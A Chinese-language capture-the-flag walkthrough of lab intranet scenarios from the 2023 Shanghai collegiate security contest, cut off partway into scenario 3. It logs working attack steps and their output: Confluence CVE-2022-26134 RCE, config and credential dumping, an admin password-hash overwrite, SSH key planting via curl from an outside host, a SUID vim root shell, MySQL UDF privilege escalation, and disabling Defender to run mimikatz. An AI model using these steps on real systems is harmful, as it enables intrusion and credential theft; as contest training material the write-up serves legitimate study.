本文首发于 SecIN 社区: https://sec-in.com/article/2226 , https://sec-in.com/article/2227
引言
第八届上海市大学生网络安全大赛
暨“磐石行动”2023(首届)大学生网络安全邀请赛
—— CTF比赛
2023.5.20 9:00 - 21:00
—— 漏洞挖掘比赛
2023.5.21 00:00 - 2023.5.22 24:00
CTF 比赛的 Writeup 可以参考喵喵的上一篇博客:
CTF | 2023 第八届上海市大学生网络安全大赛 / 磐石行动 CTF部分 WriteUp
今年的上海市赛新加了漏洞挖掘环节,实际上是给了四套自带内网的靶场让选手打渗透,两天打下来感觉还是挺坑的,这篇博客就来记录下 渗透挖洞的过程 吧。
既然是 Walkthrough,那文中必然有不少走错路的时候,说不定还有写得不对的地方,师傅们看的时候就当听故事好了(哈哈
notice
关于flag内容
并非所有容器都有flag,有flag的服务器linux系统存放在/root/目录下,windows系统存放在桌面目录下,仅 <漏洞挖掘场景3> 中,有一个flag存放位置不在上述目录,可通过find查找到flag文件。
请各位选手注意,场景在完成全部作答后在平台中题目上会显示已解决图标,若没有完成全部作答则说明还没有获取全部答案,需要继续进行!
另外漏洞挖掘赛场景总共就4套 不会再发布其他题目 题目里面一台机器就一个flag 根据平台公告内容 如果不在指定位置就是没有flag 继续玩下去找 一个场景里面含有3-6台服务器
关于赛题难度
赛题难度排序为(由高至低):场景3->场景2->场景4->场景1
关于赛题场景内数量
以下为场景及flag数量信息;
场景1:3台服务器,2个flag;场景2:6台服务器,4个flag;场景3:6台服务器,4个flag;场景4:4台服务器,3个flag关于场景3的flag公告
场景3的flag仅最后一个需要find,其他flag都在可见位置。
不知道是不是第一年办漏洞挖掘比赛的原因,其实感觉挺坑的,第一天比赛的时候都不透露每个场景里有多少机器以及多少个 flag,而且不是拿下了一台机器就一定有 flag,就得硬猜。
于是第一天凌晨喵喵在看场景 3 的时候日了入口机器,他公告写了 有个 flag 不在默认目录要自己 find,但是喵喵找死找不到 flag,直到比赛第二天快结束了才说不在指定位置就是这台机器没有 flag,人麻了。。
漏洞挖掘场景2 [1/4]
(icmp) Target 10.103.252.84 is alive
[*] Icmp alive hosts len is: 1
10.103.252.84:22 open
10.103.252.84:3306 open
10.103.252.84:8090 open
[*] alive ports len is: 3
重新扫
(icmp) Target 10.103.187.168 is alive
[*] Icmp alive hosts len is: 1
10.103.187.168:22 open
10.103.187.168:3306 open
10.103.187.168:8090 open
10.103.187.168:8091 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://10.103.187.168:8091 code:204 len:0 title:None
[*] WebTitle: http://10.103.187.168:8090 code:302 len:0 title:None 跳转url: http://10.103.187.168:8090/login.action?os_destination=%2Findex.action&permissionViolation=true
[*] WebTitle: http://10.103.187.168:8090/login.action?os_destination=%2Findex.action&permissionViolation=true code:200 len:33317 title:登录 - Confluence
[+] InfoScan:http://10.103.187.168:8090/login.action?os_destination=%2Findex.action&permissionViolation=true [ATLASSIAN-Confluence]基于 Atlassian Confluence 7.14.2 技术构建
CVE-2022-26134 Confluence OGNL RCE 漏洞分析
天下大木头师傅的 Confluence CVE-2022-26134 漏洞分析
Confluence Server and Data Center - CVE-2022-26134 - Critical severity unauthenticated remote code execution vulnerability
https://github.com/nxtexploit/CVE-2022-26134
$ python CVE-2022-26134.py http://10.103.252.84:8090/ id
Confluence target version: [1;94m7.14.2[1;m
uid=1001(confluence) gid=1001(confluence) groups=1001(confluence)
$ uname -a
Linux localhost 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
NAME="CentOS Linux" VERSION="7 (Core)" ID="centos" ID_LIKE="rhel fedora" VERSION_ID="7" PRETTY_NAME="CentOS Linux 7 (Core)" ANSI_COLOR="0;31" CPE_NAME="cpe:/o:centos:centos:7" HOME_URL="https://www.centos.org/" BUG_REPORT_URL="https://bugs.centos.org/" CENTOS_MANTISBT_PROJECT="CentOS-7" CENTOS_MANTISBT_PROJECT_VERSION="7" REDHAT_SUPPORT_PRODUCT="centos" REDHAT_SUPPORT_PRODUCT_VERSION="7"
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:999:998:User for polkitd:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:998:995::/var/lib/chrony:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false confluence:x:1001:1001:Atlassian Confluence:/home/confluence:/bin/bash
$ ls /
bin boot dev etc home lib lib64 media mnt network.ini opt proc root run sbin srv sys tmp usr var
$ pwd
/opt/atlassian/confluence/bin
$ ls
bootstrap.jar catalina.bat catalina.sh catalina-tasks.xml ciphers.bat ciphers.sh commons-daemon.jar configtest.bat configtest.sh confluence-context-path-extractor.jar daemon.sh digest.bat digest.sh display-help.bat display-help.sh install_linux_service.sh makebase.bat makebase.sh OS X - Run Confluence In Background.command OS X - Run Confluence In Terminal Window.command OS X - Stop Confluence.command service.bat setclasspath.bat setclasspath.sh setenv.bat setenv.sh setjre.bat setjre.sh setup_user.sh shutdown.bat shutdown.sh start-confluence.bat start-confluence.sh startup.bat startup.sh stop-confluence.bat stop-confluence.sh synchrony synchrony-proxy-watchdog.jar tcnative-1.dll tomcat9.exe tomcat9w.exe tomcat-juli.jar tool-wrapper.bat tool-wrapper.sh update-acl-for-custom-confluence-folder.bat user.sh version.bat version.sh
$ env
OLDPWD=/opt/atlassian/confluence JDK_JAVA_OPTIONS= --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED --add-opens=java.base/java.util.concurrent=ALL-UNNAMED --add-opens=java.rmi/sun.rmi.transport=ALL-UNNAMED JAVA_OPTS=-javaagent:/opt/atlassian/atlassian-agent-v1.3.1/atlassian-agent.jar -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 JRE_HOME=/opt/atlassian/confluence/jre/ START_CONFLUENCE_JAVA_OPTS=-Datlassian.plugins.startup.options='' PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin PWD=/opt/atlassian/confluence/bin LANG=en_US.UTF-8 CATALINA_OPTS=-Datlassian.plugins.startup.options='' -Dorg.apache.tomcat.websocket.DEFAULT_BUFFER_SIZE=32768 -Dconfluence.context.path= -Djava.locale.providers=JRE,SPI,CLDR -Dsynchrony.enable.xhr.fallback=true -Datlassian.plugins.enable.wait=300 -Djava.awt.headless=true -Xloggc:/opt/atlassian/confluence/logs/gc-2023-05-20_21-14-22.log -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=2M -Xlog:gc+age=debug:file=/opt/atlassian/confluence/logs/gc-2023-05-20_21-14-22.log::filecount=5,filesize=2M -XX:G1ReservePercent=20 -XX:+UseG1GC -XX:+ExplicitGCInvokesConcurrent -XX:+PrintGCDateStamps -XX:+IgnoreUnrecognizedVMOptions -XX:ReservedCodeCacheSize=256m -Xms1024m -Xmx1024m CONFLUENCE_CONTEXT_PATH= CONF_USER=confluence SHLVL=4 CATALINA_PID=/opt/atlassian/confluence/work/catalina.pid _=/opt/atlassian/confluence/jre//bin/java HOME=flag 在 /root/ 目录下,当前用户权限,找个地方提权,mysql?
数据库的配置文件
$ python CVE-2022-26134.py http://10.103.252.84:8090/ "cat /var/atlassian/application-data/confluence/confluence.cfg.xml"
Confluence target version: [1;94m7.14.2[1;m
<?xml version="1.0" encoding="UTF-8"?> <confluence-configuration> <setupStep>complete</setupStep> <setupType>custom</setupType> <buildNumber>8803</buildNumber> <properties> <property name="admin.ui.allow.daily.backup.custom.location">false</property> <property name="admin.ui.allow.manual.backup.download">false</property> <property name="admin.ui.allow.site.support.email">false</property> <property name="atlassian.license.message">AAABLA0ODAoPeJxtkFtLwzAUgN/zKwI+Z6ytRRQCZm0Y0zYdttv0MatnGsiykktx/97s9iLCeTm3j ++cuy4AZoPFaY6T/CnJYuCi7XA6TTNUguutGrw6GFoczE4HMD0gEfZbsM1u5cA6ShJUWJCnoVJ6o KdNMr0naY7ijpe9F3IP1IPzCeojZRJLaowVG+A2wmupNFVmVE5tNTy7HgxMjEZ8lDqc4XQntYMLo VKx76A7DnCGF01d87diwSoUQcaDkVGU/wzKHi9SWfZAkvQkdQbcTih0cB6sOHyCo1PUckE/mhWu2 SvHNccMt6zESyZKNkGN/ZJGuYuMEmvVqlnFccdZjVqwI9hFSWfzJifzuViR5PF9QzYv7RpdbWO3W pS37H+5ZbD9t3Tw55O/GO2IwTAsAhRUWCE6ipB5qHBRf+XtHnqnX1gdHgIUFvOiPKmn4ZhUVuqgO F6E9COcGh8=X02f3</property> <property name="attachments.dir">${confluenceHome}/attachments</property> <property name="confluence.setup.locale">zh_CN</property> <property name="confluence.setup.server.id">BGO5-GGNU-19XW-WJSV</property> <property name="confluence.webapp.context.path"></property> <property name="finalizedBuildNumber">8803</property> <property name="hibernate.c3p0.validate">true</property> <property name="hibernate.connection.autocommit">false</property> <property name="hibernate.connection.driver_class">com.mysql.jdbc.Driver</property> <property name="hibernate.connection.isolation">2</property> <property name="hibernate.connection.password">Confluence.123</property> <property name="hibernate.connection.provider_class">com.atlassian.confluence.impl.hibernate.DelegatingHikariConnectionProvider</property> <property name="hibernate.connection.url">jdbc:mysql://localhost/confluence?sessionVariables=tx_isolation='READ-COMMITTED'</property> <property name="hibernate.connection.username">confluence</property> <property name="hibernate.database.lower_non_ascii_supported">true</property> <property name="hibernate.dialect">com.atlassian.confluence.impl.hibernate.dialect.MySQLDialect</property> <property name="hibernate.hikari.idleTimeout">30000</property> <property name="hibernate.hikari.maximumPoolSize">60</property> <property name="hibernate.hikari.minimumIdle">20</property> <property name="hibernate.hikari.registerMbeans">true</property> <property name="hibernate.setup">true</property> <property name="jwt.private.key">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</property> <property name="jwt.public.key">MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAwPN47Iz3qCt2p045u43/4rGwccTPfuJ/u6JAfTQ+9TjtJskRUAwZmEnhqhtfNDcoAUzv0TXfxlrfbznJb1caNoG4uPlXZg6WA9HAqxeEwTf4QWO434QX/DYRBsoeQI0qhqYRTAgUV7vLZzaMa9VRyj2VWVwu8gRWEvcA1UA+uPiel7IlBe2xazY9ZFnB3SsR1FdZxasgEb6EW8iBN9ZBozVt0RwlA+Bdn5MpzQoYPq+7avL1Dh5X1uuW3K1ADFG1CPa0hJ7DrtaNYGmeWTuAOXrjQNiYevtduLZ0rPZPT6rwAD6aCmu6VvVKU5FL2aeoOidEack7BKKFaiDaGMP4OasDpPKYl49tWuIwbqw+xizhzu5uuBKTkhE3Vjm6zRgsG9u6wtbmm7h5BUgzoi91MvLdx/4JuhrFGr0hXnGvtimymbiqcRO+AKWaJVgns1AbkPEgC5OoJmEtl8NFT4bIn/1hW4AXOT64u0sR9thhcWAybN9ZUV4NkCa+fNLd5c0NAgMBAAE=</property> <property name="lucene.index.dir">${localHome}/index</property> <property name="spring.datasource.hikari.registerMbeans">true</property> <property name="synchrony.encryption.disabled">true</property> <property name="synchrony.proxy.enabled">true</property> <property name="webwork.multipart.saveDir">${localHome}/temp</property> </properties> </confluence-configuration>数据库 3306
confluence
Confluence.123
5.7.42
好像是 mysql 权限,也没 root
还得提权?
cwd_user 表
admin
{PKCS5S2}zpwacMtAM1bWGcw8W+dVDjt2BFP3BwDXzYcvM6yXYatgXmWq+aOtOQ+GrgFc5FYw
select u.id, u.user_name, u.active from cwd_user u
join cwd_membership m on u.id=m.child_user_id join cwd_group g on m.parent_id=g.id join cwd_directory d on d.id=g.directory_id
where g.group_name = 'confluence-administrators' and d.directory_name='Confluence Internal Directory';
458753
update cwd_user set credential =
'{PKCS5S2}ltrb9LlmZ0QDCJvktxd45WgYLOgPt2XTV8X7av2p0mhPvIwofs9bHYVz2OXQ6/kF'
where id=458753;修改密码为 Ab123456,登录
还得提权?
shell 弹不回来好难受,只能正向打啊啊啊
可以弹公网
但是不如直接写私钥然后 ssh 登录
python CVE-2022-26134.py http://10.103.187.168:8090/ "mkdir /home/confluence/.ssh/"
python CVE-2022-26134.py http://10.103.187.168:8090/ "curl vpsip:port/authorized_keys -o /home/confluence/.ssh/authorized_keys"Sudo version 1.8.23
Sudoers policy plugin version 1.8.23
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.23
看看 sudo 提权 或者 CVE-2021-4034 pwnkit 那个
看起来都不行
入口 flag1 192.168.0.12
草,vim 有 suid 权限
vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
sh-4.2# cat /root/flag
flag{dST7HmECAWgnrv6jDP9Yex18O2QGiVa0}sh-4.2#
sh-4.2# cat /root/提示.txt
管理员留下这些字符串也不知道做什么用
192.168.0.55
2W2mg^v6B6UJNR@Svs内网
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1450
inet 10.103.187.168 netmask 255.255.0.0 broadcast 10.103.255.255
inet6 fe80::5054:7fff:fe39:dae6 prefixlen 64 scopeid 0x20<link>
ether 52:54:7f:39:da:e6 txqueuelen 1000 (Ethernet)
RX packets 240175 bytes 22037866 (21.0 MiB)
RX errors 0 dropped 331 overruns 0 frame 0
TX packets 29026 bytes 5772108 (5.5 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1450
inet 192.168.0.12 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::5054:53ff:fe6e:8ffc prefixlen 64 scopeid 0x20<link>
ether 52:54:53:6e:8f:fc txqueuelen 1000 (Ethernet)
RX packets 70 bytes 8372 (8.1 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 7 bytes 586 (586.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 393857 bytes 49735606 (47.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 393857 bytes 49735606 (47.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
(icmp) Target 192.168.0.12 is alive
(icmp) Target 192.168.0.33 is alive
(icmp) Target 192.168.0.55 is alive
[*] Icmp alive hosts len is: 3
192.168.0.33:6379 open
192.168.0.55:3306 open
192.168.0.12:3306 open
192.168.0.55:445 open
192.168.0.55:139 open
192.168.0.55:135 open
192.168.0.33:22 open
192.168.0.12:8091 open
192.168.0.12:8090 open
192.168.0.12:22 open
[*] alive ports len is: 10
start vulscan
[*] NetBios: 192.168.0.55 WORKGROUP\WIN-FGHCOKNHM7P Windows Server 2016 Datacenter 14393
[*] WebTitle: http://192.168.0.12:8091 code:204 len:0 title:None
[*] WebTitle: http://192.168.0.12:8090 code:302 len:0 title:None 跳转url: http://192.168.0.12:8090/login.action?os_destination=%2Findex.action&permissionViolation=true
[*] WebTitle: http://192.168.0.12:8090/login.action?os_destination=%2Findex.action&permissionViolation=true code:200 len:33317 title:登录 - Confluence
[+] InfoScan:http://192.168.0.12:8090/login.action?os_destination=%2Findex.action&permissionViolation=true [ATLASSIAN-Confluence]192.168.0.55 win
2W2mg^v6B6UJNR@Svs
用上面的连接信息连
3389 是不是没开不让连啊。。
是不是哪里锅了(
噢,还有 3306 啊
MySQL 5.5.53
直接 udf 提权
-- select @@basedir;
-- C:/Program Files/MySQL/MySQL Server 5.5/
SELECT 0x4d5a90000300000004000000ffff0000...0000000000 INTO DUMPFILE 'C:\\Program Files\\MySQL\\MySQL Server 5.5\\lib\\plugin\\udf.dll';
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';
select sys_eval('whoami');
系统权限好啊!
������ C �еľ�û�б�ǩ��
�������� A696-C4FC
C:\Users ��Ŀ¼
2023/03/24 15:05 <DIR> .
2023/03/24 15:05 <DIR> ..
2023/05/05 14:40 <DIR> Administrator
2018/02/03 08:23 <DIR> Public
0 ���ļ� 0 �ֽ�
4 ��Ŀ¼ 126,700,122,112 �����ֽ�
������ C �еľ�û�б�ǩ��
�������� A696-C4FC
C:\Users\Administrator\Desktop ��Ŀ¼
2023/05/10 22:18 <DIR> .
2023/05/10 22:18 <DIR> ..
2023/05/05 14:39 1,190 RedisDesktopManager.lnk
1 ���ļ� 1,190 �ֽ�
2 ��Ŀ¼ 126,700,122,112 �����ֽ�
Windows IP ����
��̫�������� ��̫�� 2:
�����ض��� DNS �� . . . . . . . :
�������� IPv6 ��ַ. . . . . . . . : fe80::2caf:f7d7:cd87:c5dc%5
IPv4 ��ַ . . . . . . . . . . . . : 192.168.0.55
�������� . . . . . . . . . . . . : 255.255.255.0
Ĭ������. . . . . . . . . . . . . :
��������� Reusable ISATAP Interface {1798E6ED-B1D3-4DA3-A24B-2CE5D2862706}:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�����
�����ض��� DNS �� . . . . . . . :
\\ ���û��ʻ�
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
����������ϣ�������һ����������
�ӿ�: 192.168.0.55 --- 0x5
Internet ��ַ �����ַ ����
192.168.0.12 52-54-53-6e-8f-fc ��̬
192.168.0.255 ff-ff-ff-ff-ff-ff ��̬
224.0.0.22 01-00-5e-00-00-16 ��̬
224.0.0.252 01-00-5e-00-00-fc ��̬
239.255.255.250 01-00-5e-7f-ff-fa ��̬
255.255.255.255 ff-ff-ff-ff-ff-ff ��̬
�����
Э�� ���ص�ַ �ⲿ��ַ ״̬ PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 708
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1800
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 828
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 440
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 964
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 836
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 836
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 1620
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 560
TCP 0.0.0.0:49670 0.0.0.0:0 LISTENING 1512
TCP 0.0.0.0:49671 0.0.0.0:0 LISTENING 568
TCP 192.168.0.55:139 0.0.0.0:0 LISTENING 4
TCP 192.168.0.55:3306 192.168.0.12:43636 ESTABLISHED 1800
TCP 192.168.0.55:3306 192.168.0.12:43702 ESTABLISHED 1800
TCP 192.168.0.55:3306 192.168.0.12:43798 ESTABLISHED 1800
TCP [::]:135 [::]:0 LISTENING 708
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:3389 [::]:0 LISTENING 828
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 440
TCP [::]:49665 [::]:0 LISTENING 964
TCP [::]:49666 [::]:0 LISTENING 836
TCP [::]:49667 [::]:0 LISTENING 836
TCP [::]:49668 [::]:0 LISTENING 1620
TCP [::]:49669 [::]:0 LISTENING 560
TCP [::]:49670 [::]:0 LISTENING 1512
TCP [::]:49671 [::]:0 LISTENING 568
UDP 0.0.0.0:123 *:* 320
UDP 0.0.0.0:500 *:* 836
UDP 0.0.0.0:3389 *:* 828
UDP 0.0.0.0:4500 *:* 836
UDP 0.0.0.0:5050 *:* 320
UDP 0.0.0.0:5353 *:* 1032
UDP 0.0.0.0:5355 *:* 1032
UDP 127.0.0.1:1900 *:* 3200
UDP 127.0.0.1:49704 *:* 3200
UDP 192.168.0.55:137 *:* 4
UDP 192.168.0.55:138 *:* 4
UDP 192.168.0.55:1900 *:* 3200
UDP 192.168.0.55:49703 *:* 3200
UDP [::]:123 *:* 320
UDP [::]:500 *:* 836
UDP [::]:3389 *:* 828
UDP [::]:4500 *:* 836
UDP [::]:5353 *:* 1032
UDP [::]:5355 *:* 1032
UDP [::1]:1900 *:* 3200
UDP [::1]:49702 *:* 3200
UDP [fe80::2caf:f7d7:cd87:c5dc%5]:1900 *:* 3200
UDP [fe80::2caf:f7d7:cd87:c5dc%5]:49701 *:* 3200
ӳ������ PID �Ự�� �Ự# �ڴ�ʹ��
========================= ======== ================ =========== ============
System Idle Process 0 Services 0 4 K
System 4 Services 0 132 K
smss.exe 268 Services 0 1,072 K
csrss.exe 360 Services 0 4,068 K
csrss.exe 432 Console 1 3,688 K
wininit.exe 440 Services 0 5,048 K
winlogon.exe 492 Console 1 13,128 K
services.exe 560 Services 0 6,868 K
lsass.exe 568 Services 0 13,480 K
svchost.exe 652 Services 0 13,160 K
svchost.exe 708 Services 0 8,000 K
dwm.exe 820 Console 1 29,492 K
svchost.exe 828 Services 0 13,256 K
svchost.exe 836 Services 0 43,116 K
svchost.exe 908 Services 0 17,144 K
svchost.exe 964 Services 0 13,080 K
svchost.exe 320 Services 0 15,656 K
svchost.exe 628 Services 0 15,600 K
svchost.exe 1032 Services 0 19,308 K
svchost.exe 1040 Services 0 6,952 K
svchost.exe 1512 Services 0 6,660 K
spoolsv.exe 1620 Services 0 15,552 K
svchost.exe 1672 Services 0 19,412 K
dllhost.exe 1748 Services 0 7,576 K
mysqld.exe 1800 Services 0 31,636 K
svchost.exe 1848 Services 0 7,956 K
MsMpEng.exe 1900 Services 0 167,532 K
qemu-ga.exe 1916 Services 0 8,544 K
dllhost.exe 2044 Services 0 12,448 K
msdtc.exe 2184 Services 0 9,632 K
LogonUI.exe 2580 Console 1 41,408 K
svchost.exe 3200 Services 0 6,564 K
cmd.exe 2420 Services 0 2,756 K
conhost.exe 2292 Services 0 7,020 K
tasklist.exe 2800 Services 0 7,756 K
WmiPrvSE.exe 3756 Services 0 8,464 Kmimikatz 被杀了。。
MsMpEng.exe <=> Microsoft Security Essentials
直接加个账号练上去,然后关掉 win defender,然后 dump
啥也没有啊
不过 Administrator 的桌面上有个 Redis 客户端,估计连的是 192.168.0.33:6379 这个
感觉这台机器上哪里存了密码
赛后看了其他队 wp 发现要解本机的 NTLM hash 然后拿去 cmd5 解密得到明文密码,用这个密码就能登录 redis 然后进一步弹 shell
好吧,摸了(
漏洞挖掘场景3 [2/4]
入口 192.168.33.77 weblogic
(icmp) Target 10.103.164.235 is alive
[*] Icmp alive hosts len is: 1
10.103.164.235:22 open
10.103.164.235:7001 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle:http://10.103.164.235:7001 code:404 len:1164 title:Error 404--Not Found
[+] InfoScan:http://10.103.164.235:7001 [weblogic]经典 weblogic,直接工具一把梭哈
CVE_2020_2551
# pwd
/home/weblogic/Oracle/Middleware/user_projects/domains/base_domain
# ls -al ../../../coherence_3.7/
total 16
drwxrwxr-x. 6 weblogic weblogic 121 Apr 23 07:26 .
drwxrwxr-x. 8 weblogic weblogic 204 Apr 23 07:29 ..
drwxr-x---. 2 weblogic weblogic 265 Apr 23 07:25 bin
-rw-rw-r--. 1 weblogic weblogic 38 Apr 23 07:26 .home
drwxrwxr-x. 3 weblogic weblogic 25 Apr 23 07:26 inventory
drwxrwxr-x. 3 weblogic weblogic 4096 Apr 23 07:25 lib
-rw-rw-r--. 1 weblogic weblogic 339 Apr 23 07:26 .product.properties
-rw-rw-r--. 1 weblogic weblogic 97 Apr 23 07:25 product.xml
drwxrwxr-x. 2 weblogic weblogic 31 Apr 23 07:26 uninstall
# ls -al ../../../coherence_3.7/bin
drwxr-x---. 2 weblogic weblogic 265 Apr 23 07:25 .
drwxrwxr-x. 6 weblogic weblogic 121 Apr 23 07:26 ..
-rw-rw-r--. 1 weblogic weblogic 831 Apr 23 07:25 cache-server.cmd
-rw-rw-r--. 1 weblogic weblogic 1003 Apr 23 07:25 cache-server.sh
-rw-rw-r--. 1 weblogic weblogic 1165 Apr 23 07:25 coherence.cmd
-rw-rw-r--. 1 weblogic weblogic 1340 Apr 23 07:25 coherence.sh
-rw-rw-r--. 1 weblogic weblogic 574 Apr 23 07:25 datagram-test.cmd
